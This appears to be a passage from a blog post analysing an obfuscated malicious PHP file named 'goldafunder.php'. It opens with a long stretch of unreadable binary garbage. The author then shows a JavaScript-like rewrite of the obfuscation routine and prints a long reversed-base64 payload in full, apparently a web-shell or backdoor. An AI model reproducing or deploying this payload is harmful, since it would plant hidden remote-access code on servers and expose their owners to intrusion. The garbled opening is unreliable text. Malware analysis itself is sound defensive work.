T>AU οΏ½οΏ½IYI]}οΏ½οΏ½οΏ½οΏ½οΏ½Ρ›οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ϋ‘οΏ½6�수�٘QοΏ½οΏ½DΜ”έŒοΏ½DοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½EοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½PΩ΅οΏ½6οΏ½οΏ½HοΏ½οΏ½Υ™οΏ½έ—οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½}ٟPή’οΏ½μˆˆοΏ½ Ϋ•ΫΌΡ‰+H6οΏ½+H7IοΏ½6οΏ½μˆ‹οΏ½οΏ½οΏ½Qέ”οΏ½οΏ½+H6οΏ½ά₯οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½Qέ”οΏ½Θ¦HοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½|οΏ½οΏ½οΏ½οΏ½QοΏ½|οΏ½Ϊ οΏ½οΏ½X6οΏ½Κ οΏ½Ϊ“οΏ½\οΏ½QοΏ½}ٟ�\οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½H6οΏ½οΏ½LοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Θ‹οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½\οΏ½οΏ½οΏ½UοΏ½+H6οΏ½οΏ½οΏ½QοΏ½}Ϋ”οΏ½οΏ½οΏ½Ρ‰οΏ½οΏ½Ϊ‘]οΏ½οΏ½οΏ½&οΏ½οΏ½HοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Qέ”οΏ½Θ¦HοΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½|�ځ���HοΏ½οΏ½οΏ½οΏ½οΏ½Ϊ“οΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½{ά‰οΏ½
οΏ½οΏ½UοΏ½}Υ™οΏ½Θ οΏ½οΏ½οΏ½οΏ½οΏ½Ϊ“οΏ½]οΏ½YοΏ½οΏ½]Ψ’οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½@οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+LοΏ½Θ‹οΏ½οΏ½οΏ½οΏ½οΏ½Ϋƒ@οΏ½οΏ½QοΏ½}Ϋ”οΏ½οΏ½οΏ½Ρ‰&οΏ½+LοΏ½οΏ½οΏ½οΏ½οΏ½Qέ”οΏ½Θ¦@οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½|οΏ½Ϊ οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½Μ•Ϊ“οΏ½]οΏ½UΨ™Q�����՘��ۚX6οΏ½οΏ½DοΏ½+L    ������Q��ݘ�
ݞD+@οΏ½οΏ½οΏ½Τ‚&��̜�]οΏ½οΏ½οΏ½οΏ½οΏ½Ϊ½MοΏ½οΏ½YΫ₯�̝��QοΏ½οΏ½Τ˜οΏ½οΏ½οΏ½Τ‚&οΏ½οΏ½Δ™οΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½Π›οΏ½ΪΌοΏ½ΫάœοΏ½YοΏ½οΏ½οΏ½Ψ§οΏ½&H7οΏ½οΏ½]οΏ½οΏ½UοΏ½οΏ½οΏ½έ–YοΏ½οΏ½EοΏ½οΏ½UοΏ½]οΏ½οΏ½άœΣ•οΏ½οΏ½ΡœοΏ½έ˜οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½ΪΊUοΏ½οΏ½]οΏ½&H7οΏ½οΏ½UοΏ½οΏ½Ι›οΏ½οΏ½KοΏ½UοΏ½οΏ½]��ܜ�]οΏ½οΏ½οΏ½οΏ½    Ϋ•ΫΌΥ‹οΏ½οΏ½οΏ½&H7οΏ½Ο•οΏ½οΏ½QοΏ½οΏ½Τ™οΏ½UοΏ½οΏ½QοΏ½οΏ½οΏ½ΪΌοΏ½Ω‘Qۏ���
ݞD+@οΏ½  Ϋ•ΫΌοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½Ω‘Qۏ���
ݞD+@
οΏ½YοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½QοΏ½}οΏ½οΏ½YοΏ½οΏ½οΏ½&οΏ½+D&οΏ½οΏ½@οΏ½οΏ½QοΏ½|Ϋ•οΏ½οΏ½]οΏ½|οΏ½οΏ½οΏ½οΏ½οΏ½Qέ”οΏ½οΏ½&οΏ½οΏ½T����ܐ�OοΏ½BοΏ½οΏ½οΏ½οΏ½Y���ʁ��&οΏ½+LοΏ½οΏ½οΏ½οΏ½QοΏ½|οΏ½οΏ½}ٜ��QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+D+H6οΏ½οΏ½οΏ½Ρ‰οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½&οΏ½οΏ½X6οΏ½Κ‹   οΏ½οΏ½ή—οΏ½οΏ½οΏ½οΏ½ΫΎQοΏ½οΏ½έ›0οΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½&H6�ʈ��� οΏ½οΏ½ή—οΏ½οΏ½οΏ½οΏ½οΏ½X7EοΏ½+LοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½A���ӕ�ӝ����QοΏ½οΏ½QοΏ½&H6�ʈ���
Ψ’οΏ½οΏ½οΏ½UοΏ½+H6οΏ½οΏ½DοΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½@٢������ˈ�bUPKXοΏ½PοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½οΏ½Ι οΏ½οΏ½X6�ʈ���QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½LοΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½L�����ʁ��&οΏ½οΏ½MIοΏ½οΏ½οΏ½οΏ½\�ڞ�[οΏ½οΏ½οΏ½}ٟ�YοΏ½QοΏ½~QοΏ½οΏ½]ؐ�Qέ…ά’H6�ן   οΏ½οΏ½οΏ½]οΏ½YοΏ½οΏ½οΏ½οΏ½ά–οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½έ—οΏ½Υ˜οΏ½οΏ½^��ݍ��   οΏ½οΏ½ή—οΏ½οΏ½&οΏ½οΏ½MIοΏ½οΏ½οΏ½οΏ½]οΏ½Q��ݘ��[οΏ½οΏ½οΏ½}ٟ�YοΏ½QοΏ½~QοΏ½οΏ½]ؐ�щ&οΏ½+LοΏ½ οΏ½ΤΨ’οΏ½οΏ½οΏ½έ—οΏ½Υ˜οΏ½οΏ½^��ݏTΚ½οΏ½οΏ½οΏ½οΏ½]οΏ½έ—οΏ½Υ˜οΏ½οΏ½^��ݍ��YΨ’οΏ½οΏ½οΏ½QοΏ½&οΏ½οΏ½MI$οΏ½U}TUTοΏ½IlοΏ½QXοΏ½QOοΏ½IοΏ½οΏ½οΏ½
T>AU!ά–IYI]}οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά“@οΏ½οΏ½Y܍�+LοΏ½Μ‹οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΘŸΜ‹οΏ½οΏ½οΏ½οΏ½ΪœοΏ½οΏ½EοΏ½οΏ½οΏ½οΏ½DΟ‚LοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½MI3οΏ½=SHWIYI]οΏ½οΏ½TοΏ½TοΏ½WοΏ½
�ќ����\��ٜ��+D&οΏ½οΏ½TοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½~QήΌοΏ½οΏ½}ٜ��QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+D+LοΏ½Ι™οΏ½]οΏ½οΏ½]οΏ½}]οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ρ‰οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½&οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½οΏ½Ϋ°έ—οΏ½οΏ½έŽX6οΏ½οΏ½@�������ٟ�[οΏ½]οΏ½οΏ½Ι™οΏ½]οΏ½οΏ½]οΏ½}]οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ρ‰&οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½Ε™οΏ½]���݌��������+LοΏ½  Ϋ•Υ˜οΏ½]οΏ½οΏ½οΏ½οΏ½   SοΏ½I]WοΏ½UCοΏ½I]PοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά½οΏ½οΏ½οΏ½[οΏ½]οΏ½&οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½OοΏ½eοΏ½IYOοΏ½UCοΏ½I]PοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά½οΏ½οΏ½οΏ½[οΏ½]οΏ½&οΏ½οΏ½@οΏ½οΏ½οΏ½QeοΏ½IYOοΏ½UCοΏ½I]PοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά½οΏ½οΏ½οΏ½[οΏ½]οΏ½&οΏ½οΏ½@οΏ½οΏ½ΜƒοΏ½οΏ½WοΏ½6Q}T?TοΏ½οΏ½
οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½Υ‚+LοΏ½@Θ°οΏ½QοΏ½SοΏ½U8οΏ½UQY}T?TοΏ½οΏ½
οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½Υ‚+LοΏ½  οΏ½οΏ½οΏ½0οΏ½U}T?TοΏ½οΏ½
οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½Υ‚+LοΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½[οΏ½]Ψƒ@Θ Ρ‰&οΏ½οΏ½XοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΝΎIοΏ½οΏ½οΏ½οΏ½L�Ĉ��LοΏ½Η€οΏ½οΏ½Ν½E������ݘ���՚��3Q"οΏ½
οΏ½οΏ½ΜΉοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½Ρ€ή‚οΏ½οΏ½Ϋ…οΏ½\οΏ½Γ€οΏ½οΏ½οΏ½οΏ½8οΏ½οΏ½Ρ™οΏ½]οΏ½οΏ½οΏ½οΏ½οΏ½LΛ‡οΏ½οΏ½οΏ½οΏ½4οΏ½οΏ½Σ•οΏ½οΏ½YοΏ½οΏ½οΏ½έ“οΏ½οΏ½οΏ½Qɑٟ�YοΏ½QοΏ½~QοΏ½οΏ½]ΨƒοΏ½οΏ½οΏ½ΨΉYοΏ½+H6οΏ½+H7IοΏ½6�ٜQοΏ½οΏ½οΏ½οΏ½Qέ”οΏ½οΏ½+@οΏ½οΏ½οΏ½+@οΏ½οΏ½οΏ½+D&οΏ½οΏ½DοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ι»HοΏ½οΏ½οΏ½Σ•οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½H���؏rQΩΌοΏ½οΏ½s׽���՘����YοΏ½οΏ½άƒ@Θ•Υ˜οΏ½οΏ½&�숏�Џ������UοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½&οΏ½οΏ½LοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½sοΏ½ά‹Θ‘AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½Σ•οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½H6���ψ��   Ϋ—UοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+LοΏ½Ο€οΏ½ΪΊQοΏ½οΏ½οΏ½οΏ½οΏ½]ێ��UοΏ½+DοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½6οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Υ˜οΏ½οΏ½οΏ½Ι›οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Μ‹οΏ½οΏ½οΏ½LοΏ½οΏ½οΏ½οΏ½οΏ½    Ϋ—UοΏ½οΏ½QοΏ½οΏ½AοΏ½οΏ½UοΏ½}Υ™οΏ½ΘΈοΏ½οΏ½οΏ½οΏ½οΏ½Υ˜οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½άƒ@Θ•Υ˜οΏ½οΏ½&οΏ½οΏ½LοΏ½Σ•οΏ½οΏ½QοΏ½οΏ½οΏ½Ρ•οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½D+LοΏ½οΏ½ΪΊQοΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½^οΏ½οΏ½ά„οΏ½οΏ½Ι›οΏ½οΏ½&H6�Ȧ̊���AοΏ½οΏ½οΏ½Θ₯οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ω™οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½6οΏ½οΏ½DοΏ½οΏ½Ϋ—UοΏ½οΏ½QοΏ½οΏ½   ��ݘ�LοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Σ•οΏ½οΏ½ΡŠοΏ½UοΏ½οΏ½AοΏ½&οΏ½+H7EοΏ½+LοΏ½οΏ½έΉUοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½UΪΉ]οΏ½οΏ½YοΏ½οΏ½QοΏ½οΏ½οΏ½Σ•οΏ½οΏ½QοΏ½οΏ½οΏ½&οΏ½οΏ½M\οΏ½οΏ½οΏ½mοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Σ•οΏ½οΏ½QοΏ½οΏ½οΏ½&οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½MοΏ½οΏ½ΙƒοΏ½οΏ½οΏ½Ι£οΏ½οΏ½οΏ½ZοΏ½Ψ·οΏ½YοΏ½οΏ½ά οΏ½οΏ½X6οΏ½Κ’EοΏ½Θ•Ψƒ@οΏ½οΏ½Ϋ—UοΏ½οΏ½QοΏ½&οΏ½+LοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½M��ɒٝYοΏ½}]οΏ½οΏ½Χ•Ω›οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΨΉYοΏ½+H7IοΏ½6�ؐ��Qέ”οΏ½οΏ½+LοΏ½οΏ½οΏ½οΏ½EJοΏ½AοΏ½οΏ½οΏ½οΏ½οΏ½έ½οΏ½οΏ½οΏ½Λ‹οΏ½TQRοΏ½οΏ½ZοΏ½οΏ½οΏ½vPοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½]οΏ½Π‘οΏ½Ο˜οΏ½|URnQ�����ڒ�׈ؐ�����IHοΏ½AοΏ½οΏ½οΏ½ZοΏ½οΏ½οΏ½οΏ½οΏ½ά§TΨ’H6οΏ½οΏ½IYI]}οΏ½]?οΏ½}οΏ½PοΏ½QTUQKοΏ½IοΏ½MοΏ½οΏ½UοΏ½~UοΏ½Θ•οΏ½TΪ’H6οΏ½οΏ½οΏ½AοΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½ΡˆοΏ½ΥšοΏ½Ω›Υ™οΏ½6οΏ½οΏ½@οΏ½οΏ½ΪΆQοΏ½}UοΏ½οΏ½οΏ½οΏ½]οΏ½+H4οΏ½οΏ½&οΏ½+D+D*οΏ½οΏ½οΏ½
Enter fullscreen mode Exit fullscreen mode

I must now attempt to deobfuscate goldafunder.php to bring meaning to the base64 encoded text.

After transforming the original php file into a somewhat javascript:

var randomText="3K4hbIR80HU_5VL1MzAqr6GgewJPjOsC9f7uFYnixvSydaNTkDX2ctlZpomQWEB"; var firstText=randomText[4] +randomText[45]+  randomText[30]+  randomText[24]+ randomText[21]  +randomText[2] +randomText[11] +randomText[44] +randomText[24]+  
randomText[52]+  randomText[57] +randomText[44]+randomText[24]; var secondText=randomText[30]+ randomText[53]+ randomText[20] +randomText[20]+ randomText[24]  +randomText[41]; var thirdText=randomText[24]+  
randomText[20] +randomText[20] + randomText[57]+  
randomText[20]+ randomText[11]+randomText[20]+randomText[24]+  randomText[56]  +randomText[57] +randomText[20]+ randomText[53]  +randomText[39]  +randomText[38]+ randomText[23]; var fourthText=randomText[52] +randomText[20]+  
randomText[24] +randomText[45] + randomText[53] +randomText[24]  +randomText[11]+  randomText[33] +randomText[35] + randomText[38]+  randomText[52]+ randomText[53]+randomText[39] +randomText[57]+randomText[38];thirdText(0); var fifthText=fourthText("",firstText(secondText("K0QfK0gCN0XCK0wO0lGeltjZ1JGJg8GajVWCJoQD7kCKldWYw9Ve49mcw9FdldWPpQ3YkwiZ1JGJoQ3cpxWCJoQDK0welNHbl1XCK0QfJkgCNsDdphXZ7YWdiRCIvh2YllQCJoQD9lQCJoQD7kCKldWYw9Ve49mcw9FdldWPpQ3YkwiZ1JGJoQ3cpxWCJkQCK0welNHbl1XCJkgCNsTKhVHJskiZlJHJoUGZvNmblxmc1dXYy5iI9YWZyZiIuAXa51GJuISPyRGZhZiIukCeyVHJoUGZvNmblxmc1dXYy5iI9UnJi4SK0N3boRCKlR2bj5WZsJXd3FmcuISPkZiIukSZzFmYkgSZk92YuVGbyV3dhJnLi0TZzFmYmIiLpQmcvdXeltGJoUGZvNmblxmc1dXYy5iI9sWbmIiLrNWYwRUSk4iI9AXa/AHaw5iZm9ibpFWbvRGJv8iOwRHdoJCK0V2ZfV2ZhB3X5xmc1NWPp8mZul2X0V2ZfV2ZhB3X5xmc1NGJsYWdiRCK0NXaslQCJkgCNsXKp0lIy92bkNXais1bm5WakgCdlN3cphCImlWCJkgCNsHIpU2ckgCImlWCJoQD9lQCK0gCNoQDK0QfJkQCK0wO0lGeltjZ1JGJg8GajVWCJkQCK0gCN0XCJkQCK0wOpA3clJHJsA3ZlJHJsM3aulGbkwiZ1JGJogXZnVmcfV2ZhB3Xldmbhh2Y9YWdiRSCJkQCJoQD70lIw91cr5WasJyWvZmbpRSPztmbpxGJJkQCJkgCNsTM9A3clJHJ7cycp9SK+wFcvwFPc1HMzsnLo8yJ9A3ZlJHJJkQCJkgCNoQD7kSYzVmckwSYnVmckwycr5WasRCLmVnYkgCeldWZy9VZnFGcfV2ZuFGaj1jZ1JGJJkQCJkgCNsTXiE2XztmbpxmIb9mZulGJ9M3aulGbkkQCJkQCK0wOw0TYzVmckszJp9iPcF2LcxDX/oiL+w1Pq4yccFGPc9yJ9E2ZlJHJJkQCJkgCNsXKpICbtRHavQHelRnIsQ3Ykgic0NXayR3coAiZplQCJkgCNoQD7kCKldWYw9Ve49mcw9FdldWPpQ3YkwiZ1JGJoQ3cpxWCJkQCK0gCNsXZzxWZ9lQCJoQD9lQCJkgCNsDdphXZ7UGdhxGctVGdkAyboNWZJkQCJkgCNoQD9lQCJkQCK0QfJkQCJkQCK0wOpUGdhxGctVGdkwyaulGbkwiIlIiLpRiLi81SOlETfVERJNlTJViIoU2YhxGclJ3XyR3c9UGdhxGctVGdkkQCJkQCJkgCNsXKr5WasRCI+0DIpRCIzFGIztmbpx2XlRWaz5WakgCajFWZy9mZJkQCJkQCK0QCK0wOpUGdhxGctVGdkwSKpQmcvdXeltGJo0WayRHIsICLiACLiAiIoU2YhxGclJ3XyR3csISJkJ3b3lXZrViIoU2YhxGclJ3XyR3c9UGdhxGctVGdkkQCJkQCJoQD7kSZ0FGbw1WZ0RCLkJ3b3lXZrNWdkwiIlQmcvdXelt2Y1ViIoU2YhxGclJ3XyR3c9UGdhxGctVGdkkQCJkQCJoQD7kSZ0FGbw1WZ0RCLu9Wa0BXayN2clRGJsISJu9Wa0BXayN2clRWJigSZjFGbwVmcfJHdz1TZ0FGbw1WZ0RSCJkQCJkgCNsTKlRXYsBXblRHJsUGb0lGdkwiIlUGb0lGdlICKlNWYsBXZy9lc0NXPlRXYsBXblRHJJkQCJkQCK0wOpUGdhxGctVGdkwCd4VGdkwiIlQHelRXJigSZjFGbwVmcfJHdz1TZ0FGbw1WZ0RSCJkQCJkgCNsXZzxWZ9lQCJkQCK0QfJkQCJkQCK0wOpUGdhxGctVGdkwCbwVmckwyayFWbkgSZjFGbwVmcfJHdz1TZ0FGbw1WZ0RSCJkQCJkQCK0wepwGclJHJg4TPgsmch1GJgMXYg0lIy5mIb9mZulGJog2YhVmcvZWCJkQCJkgCNsXKpkSXiInbis1bm5WakgSehJnch91cphiJmkSKdJicuJyWvZmbpRCK0V2czlGKoAiZplQCJkQCK0welNHbl1XCJkQCK0wO0lGeltDduVGdu92Yy92bkRCIvh2YllQCJkQCK0wOpQHelRHJoUGZvNWZk9FN2U2chJWP05WZ052bjJ3bvRGJJkQCJkgCNsXKp0lIl52bsFGZuFGdzJyWvZmbpRCK0V2czlGKgYWaJkQCJoQDK0wepkSXiI3bvR2cpJyWvZmbpRCK0V2czlGKgYWaJkQCK0gCN0Xf7kCbhZHJoIXZkFWZoliIi0TIsFmdkgiZptTKsFmdkgSbpJHd9wWY2RyepwWY2RCIzFGIzVGc5RHJog2YhVmcvZ2OpUGc5RHduVGdu92YkwiIuxlIoUGZvxGc4VWPzVGc5RHJ7kSXiUGc5RHduVGdu92Yis1bm5WakgSZk92YlR2X0YTZzFmYA1TZwlHd05WZ052bjRyepkSXiUGc5RHduVGdu92Yis1bm5WakgCdlN3cphCImlWCJkgCNsHIpQ3biRCKgYWaJkgCNsTXiM3aulGbfVGZpNnbpJyWvZmbpRCQ9M3aulGbfVGZpNnbpRyOpQmcvdXeltGJoMHZy92djVXPkJ3b3lXZrNWdksTXi42bpRHcpJ3YzVGZis1bm5WakAUPu9Wa0BXayN2clRGJ70lIlxGdpRnIb9mZulGJA1TZsRXa0RyOdJCd4VGdis1bm5WakAUP0hXZ0RyOdJSZzFmYis1bm5WakAUPlNXYiRyOdJyajFGcElkIb9mZulGJA1zajFGcElEJ70lIkJ3b3lXZrJyWvZmbpRCQ9QmcvdXeltGJJkgCNsTKpYWdiRCKlR2bjVGZfRjNlNXYihSZ6lGbhlmclNnb11zbm5WaksTKmRCKlN3bsNmZAtTKpYGJoMHdldmZAhSbpJHd9YWdiRyOpYmZvRCLmRCKrVWZzZGQ7kiIyJCLkJGJo4WZw9mZA1jZksTKpwGctVGdkgyc05WZ052bj9Fdld2XlxWamBEKlR2bjVGZfRjNlNXYiBUPlRXYsBXblRHJJkgCNsDMr0FeyVXNk1GJbZ2Yk0jZm9GJJkgCNsTM9Q3biRSKpEWdkACLik2IyVGZpB3c1RWahJGfyVGb3FmcjxXdy5CXslWYtx3dllmdlJHcgIWZ3BSZsd2bvdGfv9GahlHf09mY8JXZklGczxXZslmYv1UL09mYlx2Zv92R8Nncl5GdyFGchlGZl1Eflx2Zv92RtQ3bCNHZBxnclx2dhJ3YtE2cnxXZsd2bvd2IigCajRXYt91ZlJHcoAiZplQCK0wOx0TZzRSKpYWZyRCIsISaj02bj5CXu9Gb5JWYixXbvNmLcVmZhNWek5WYoxXbvNmLch2YyFWZzJWZ3lXb812bj5CX392d8RXZu5CXyVGdyFGajxXbvNmLcRXa1RmbvNGfv9GahlHfoNmchV2c8FGdzlmdhRHbhxXbvNmLcx2bhxXbvNmLct2chxXbvNmLc52ctxXbvNmLcdmbpJGflx2Zv92ZjICKoNGdh12XnVmcwhCImlWCJoQD70lISRERB9VRU9UTFJlIbJVRWJVRT9FJA1DcplXbksTXiIVRSVkRFJ1XQRFVIJyWSVkVSV0UfRCQ9YWZyRyOdJCVOV0RB9lUFNVVfBFVUhkIbJVRWJVRT9FJA1TY1RyOw0TZzRyOw0DdvJGJJkgCNsXKp0FeyVXNk1GJbZ2YkgCdlN3cpBEKgYWaJoQDJoQD9lgCNsTKpkycnlmZu92Ykgyc05WZ052bj9Fdld2XlxWamBEKlR2bjVGZfRjNlNXYiBEKlpXasFWayV2cuVHQ9Y2YkkQCK0wepkycnlmZu92Ykgyc0NXa4V2XlxWamBEKgYWaJoQD7kCK5FmcyFWPmNGJJoQDK0welNHbl1nCNoQDK0QfJoQDK0wO0lGellQCK0gCNsTKpQXdvRCKlpXasFWayV2coUGZvNmbl9FN2U2chJGIvh2YllQCK0wOpkQCJkQCK0ALwAiOgkCbw1WZ0RCKlpXazVGbpZGI/ASKsBXblRHJoUGbpZ2XzlGI+0DInUmepN3XlxWam9VZ0FGbw1WZ0dSCJkQCJkgCNwCMgoDIpQmYkgSZ6l2clxWamByPgkCZiRCKlxWam91cpBiP9AyJlpXaz9VZslmZfJGZnkQCJkQCJoQDsM3ZpZmbvNGJg4TPgcSZslmZnlmZu92YnkQCJkQCJoQDs81XFxUSG91Xg4TPgcSZslmZnkQCJkQCJoQDsIVRWJVRT9FJg4TPgciclZnclN3JJkQCJkQCK0ALmNGJg4TPgciZjdSCJkQCJkgCNgSehJnch1Dd19GJJkgCNoQD9lQCK0wOpkSKzdWam52bjRCKzRnblRnbvN2X0V2ZfVGbpZGQoUGZvNWZk9FN2U2chJGQoUmepxWYpJXZz5WdA1jZjRSCJkgCNsXKpM3ZpZmbvNGJoMHdzlGel9VZslmZAhCImlWCJoQD7kCK5FmcyFWPmNGJJkgCNsXKiUjI90DekgCImlWCK0QfJoQD7QXa4V2Oi4GXjMyIEV0SS90VjMyIiAyboNWZJkgCNsXKiQjI90DekgCImlWCK0gCNoQD9lgCNsDdphXZJkgCNsjIux1IjMCRFRVQEBVVjMyIiAyboNWZJkgCNsTKxYWdiRCLsBXblRHJoMHduVGdu92YfRXdw9VZslmZAtTKiYWan5CbsF2cl1WZoRXLwdnIuIXdkgCdld2XldWYw9VesJXdjBUPpQHJsEjZ1JGJoQ3cpxWCJoQD7kSMmVnYkwCZiRCKzRnblRnbvN2X0VHcfVGbpZGQ7kiInBnauMnbvNWahRXZtJiLyVHJoQXZn9VZnFGcflHbyV3YA1TK0RCLxYWdiRCK0NXaslQCK0wOpEjZ1JGJsM3ZpZmbvNGJoMHduVGdu92YfRXdw9VZslmZAtTKicmbw5SMpp2btVmIuIXdkgCdld2XldWYw9VesJXdjBUPpQHJsEjZ1JGJoQ3cpxWCJoQD7IyLi4Cdz9Ga1QWbk4iIvMXZnFWbp9iIu4Wah12bkRiLi8yL6AHd0hmI9IXdkkQCK0wOi4GXjMyITVETJZ0XH5USUFERQV1IjMiIg8GajVWCJoQD7liIyISP9gHJoAiZplgCNoQD7lSKzNXYwVDZtRSP9AHJoYiJpIiI9ECekgCKgYWaK0gCNsTKpkiIwJCKsFmdfRXZnhSZk92YlR2X0YTZzFmYAhSNk1WPwRSKiISPhgHJoAiZppQD7IiI9AHJK0gCNsTKi0TPRRWe1MEZwZ1RkhGdXF2a1cVYigSZk92YlR2X0YTZzFmY94Wah12bkRiCNoQDK0wOpcSTwAjNxcCLnQXatlGbflncv1WZtdCK0V2cflmbpBkCNoQD7IiZpdmLsxWYzVWblhGdtA3di4Ca0FGcw1Gdk0Dbw1WZ0RiCNsjInBnauMnbvNWahRXZtJiLoRXYwBXb0RSPkJGJK0wOlxWamNGJugGdhBHctRHJ9M3ZpZmbvNGJK0gCNoQD7kCa0FGcw1GdkgicpR2atB0O1QWb4RiLoRXYwBXb0RSPoRXYwBXb0RiCNoQD9pQD7IiLi0Da0FGcw1GdkkgCNsXZzxWZ9pQD7kCKoRXYw9lYk9FdldWPoRXYwBXb0RSCK0wepkSZslmZjRiL1QWb4RiLi4iIoMHdzlGel9VZslmZAFCKgYWaK0gCNsjIn5GcuETaq9WblJSPlxWamNGJK0gCNsjIvIiL0N3boVDZtRiLi4yLi0TNk1GekoQDK0gCNsTK4JXdkgSNk1WP4JXd1QWbksTayVHJuQ3cvhGJ9gnc1RyOpQ3cvhGJoUDZt1Ddz9Ga1QWbkoQD7kCdz9GakwiIiwiIuc3d3JCKlNWYsBXZy9lc0NXP0N3boRiCNsTXikkUV9FVTVUVRVkUislUFZlUFN1XkAUPpJXdkoQD7kSXiQ1UPh0XQRFVIJyWSVkVSV0UfRCQoIXZ39GbvRnc0NXP0N3boRiCNoQD7IiYzQTZmFGMyUTMlN2M4ETYwYWYwIDOygTMwcTN0UWNlJSPzNXYwVDZtRiCNoQD7kiIrNWZoN2XwBHcwJCKsFmdfRXZn1DekoQD7IiI9QnblRnbvNGJK0gCNoQDK0gCN0nCNoQD7IiLiAibyVHdlJXCK0gCNsjcpR2Xw1GdkAibyVHdlJHIpkicpR2Xw1Gd